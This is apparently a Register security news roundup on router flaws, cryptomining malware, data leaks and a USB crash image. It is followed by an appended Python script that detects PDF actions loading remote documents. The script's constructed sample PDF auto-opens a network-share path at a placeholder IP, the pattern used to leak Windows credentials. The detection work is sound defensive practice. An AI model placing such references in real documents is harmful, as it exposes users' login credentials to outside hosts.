Windows USB-stick-of-death, router bugs resurrected, and more

Your weekend guide to computer security cockups


Roundup Here's your summary of infosec news – from router holes to Windows crashes – beyond what we've already covered this week.

TPLink? More like TPwnedLink, amiright? Anyone?

Tim Carrington at Fidus Infosec went public on Thursday with not-so-new remote-code execution flaws in TPLink router firmware. We're told the security holes (CVE-2017-13772) were not only reported to TPLink in October 2017, but were vulnerabilities that the company had patched in older models, only for the bugs to resurface when the exploitable code was reused in newer units.

"Code reuse is a huge problem within the IoT industry," Fidus stated in its advisory. "In most cases, what we generally see is a company who sells devices with poor security to vendors who then brand them and sell them on. Tracking the original manufacturer can be quite difficult and, in our experience, getting such vulnerabilities patched is even harder."

The stack buffer overflow bugs can be exploited via the router's built-in HTTP web server, used to configure the device, to gain control of the unit. It appears an attacker has to be able to log into the equipment to leverage the programming blunders, so make sure you're not using the default credentials.

DiFi wants an express lane for banning software

Fresh on the heels of Uncle Sam blacklisting security company Kaspersky Lab from its computers, US Congress mulls streamlining the process of blocking particular software packages from being used on government networks and systems.

Senator Dianne Feinstein (D-CA) is putting her name on the Federal Network Protection Act, a bill that would give the Secretary of Homeland Security the ability to issue binding operational directives – strict orders, in other words – to remove software from federal networks without requiring that the vendor be notified first.

"We're seeing more and more attacks on federal computer systems by foreign agents, and we need to make sure we have all the tools and authorities necessary to block those attacks," Feinstein said.

"By clarifying what actions the Secretary of Homeland Security can take, we allow the department to act quickly in response to cyber threats."

PyRoMine fires up EternalBlue flaw to forge Monero

Another day, another pack of criminals finding new and creative ways to make a buck on cryptocoins.

This time, it's the creators of a horrible piece of malware called PyRoMine. It uses the compute power of infected Windows machines to generate Monero cryptocurrency for its controllers. What's worse, the code spreads itself using the infamous EternalBlue and EternalRomance NSA-developed exploits. Sounds scary, but as Mounir Hahad of Juniper Threat Labs told El Reg, both flaws have long since been patched by Microsoft. If you're infected via these exploits, you need to take a long hard look at yourself.

"EternalRomance and EternalBlue are only made eternal by our inaction," Hahad said.

"A patch to close the vulnerabilities that these exploits use has been available since before the WannaCry era."

Bezop says be-ware, we got be-reached

Elsewhere in the world of internet funbux, blockchain commerce biz Bezop is on the defensive after researchers at Kromtech disclosed that the upstart had exposed to the public internet a poorly configured MongoDB database containing the names, email addresses, hashed passwords, and scans of IDs and passports for 25,000 of its ICO backers.

Bezop says it's no big deal, as the incident actually occurred in January.

"If you remember, we reported a DDoS attack and a couple of security holes that unintentionally exposed user data such as name, wallet addresses, address on file, copies of identification documents, etc., and that they could possibly be in the public domain. That database has since been closed and secured."

We're sure the 25,000 people whose passport images were leaked out will find that very comforting.

Cisco smells a RAT

Cisco Talos researchers dished the dirt on GravityRAT, a software nasty targeting peeps in India. They say the malware was used to pull sensitive information from companies and organizations in the country for nearly two years before it was caught.

"GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We've seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT," Talos writes.

"This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor."

Quick links

MikroTik router owners must patch their devices' firmware to prevent miscreants from exploiting a flaw in a remote administration service to swipe a copy of the user database – it is already being leveraged in the wild by scumbags to commandeer affected hardware. Also, don't forget to secure access to your HPE iLO management interfaces for your servers: hackers are exploiting poorly defended networks to hold systems to ransom.

Bitdefender bloke Marius Tivadar has developed a dodgy NTFS file system image that crashes at least Windows 7 and 10 systems: popping it on a USB stick and then plugging that into a vulnerable computer will cause it to fall over with a blue-screen-of-death when a mount attempt is made. Microsoft will not issue a patch for the programming blunder, we're told.

Medical transcription biz MEDantex leaked patient records for thousands of physicians online, according to investigative reporter Brian Krebs. Revenge porn web exchange Anon-IB was seized by Dutch police, who also collared five suspects related to the image-sharing site.

If you go traveling with your Mac, or leave it unattended around strangers, try out Objective-See's new Do Not Disturb app that thwarts evil-maid-style attempts to tamper with your computer or infect it with spyware.

Finally, Check Point warned that your Windows login details can be nicked by opening malicious PDFs that use remote document loading mechanisms to leak your credentials. ®
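The article does not name the PDF feature involved. One family of "remote document loading" actions in the PDF format is /GoToR and /GoToE (jump to a destination in another document), and the file specification attached to such an action can name a network share, which is what makes a Windows client reach out and authenticate. The script below is an added example, not Check Point's or The Register's code: it scans a raw PDF for those actions and flags targets that point off-host, the kind of check a mail gateway or a triage analyst would run on an incoming attachment. The sample document and the 203.0.113.5 address are constructed for the demo.

```python
import re
from typing import Dict, List

# Assumption: these two action types are the "remote document loading" mechanisms
# meant by the article; the page itself does not name the feature.
ACTION_RE = re.compile(rb"/S\s*(/GoToR|/GoToE)\b")

# Non-nested PDF dictionaries `<< ... >>`; nested file-spec dictionaries are not handled.
DICT_RE = re.compile(rb"<<(?:(?!<<|>>).)*>>", re.DOTALL)
# /F given as a literal string (...) or as a hex string <...>
LITERAL_F_RE = re.compile(rb"/F\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)
HEX_F_RE = re.compile(rb"/F\s*<([0-9A-Fa-f\s]*)>")

_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}


def _unescape_literal(raw: bytes) -> str:
    # Undo PDF literal-string escapes: "\\" -> "\", "\(" -> "(", "\n" -> newline, etc.
    return re.sub(rb"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), raw).decode("latin-1")


def _decode_hex(raw: bytes) -> str:
    clean = re.sub(rb"\s", b"", raw)
    if len(clean) % 2:          # PDF pads an odd trailing nibble with 0
        clean += b"0"
    return bytes.fromhex(clean.decode("ascii")).decode("latin-1")


def is_remote_path(path: str) -> bool:
    # Off-host targets: UNC (\\host\share), the forward-slash network form (//host/share),
    # or any URL scheme such as smb:// or file://. Everything else is treated as local.
    p = path.strip()
    return (
        p.startswith("\\\\")
        or p.startswith("//")
        or re.match(r"^[a-zA-Z][a-zA-Z0-9+.-]*://", p) is not None
    )


def find_remote_references(pdf_bytes: bytes) -> List[Dict[str, object]]:
    """Return every /GoToR or /GoToE action with its target and whether it points off-host."""
    findings = []
    for m in DICT_RE.finditer(pdf_bytes):
        d = m.group(0)
        action = ACTION_RE.search(d)
        if not action:
            continue
        lit, hx = LITERAL_F_RE.search(d), HEX_F_RE.search(d)
        if lit:
            target = _unescape_literal(lit.group(1))
        elif hx:
            target = _decode_hex(hx.group(1))
        else:
            continue  # action without a usable /F string
        findings.append({
            "action": action.group(1).decode("ascii"),
            "target": target,
            "remote": is_remote_path(target),
        })
    return findings


# Constructed sample: a skeletal PDF whose /OpenAction jumps into a document on a
# network share (flagged), plus a harmless local cross-document link (not flagged).
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >> endobj
4 0 obj << /S /GoTo /D [3 0 R /Fit] >> endobj
5 0 obj << /S /GoToR /F (\\\\203.0.113.5\\share\\doc.pdf) /D [0 /Fit] >> endobj
6 0 obj << /S /GoToR /F (local/appendix.pdf) /D [0 /Fit] >> endobj
%%EOF
"""

if __name__ == "__main__":
    for f in find_remote_references(SAMPLE_PDF):
        print(f"{'REMOTE' if f['remote'] else 'local':6} {f['action']} -> {f['target']}")
```

The regex pass works on the raw file, so it misses actions stored inside compressed object streams or encrypted documents; for anything beyond a quick triage, run the same check over objects produced by a full PDF parser that decompresses streams first. A finding with `remote` set is a reason to quarantine the attachment, and on the endpoint side the usual mitigation applies: block outbound SMB at the perimeter so a coerced authentication never leaves the network.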

Biting the hand that feeds IT © 1998–2022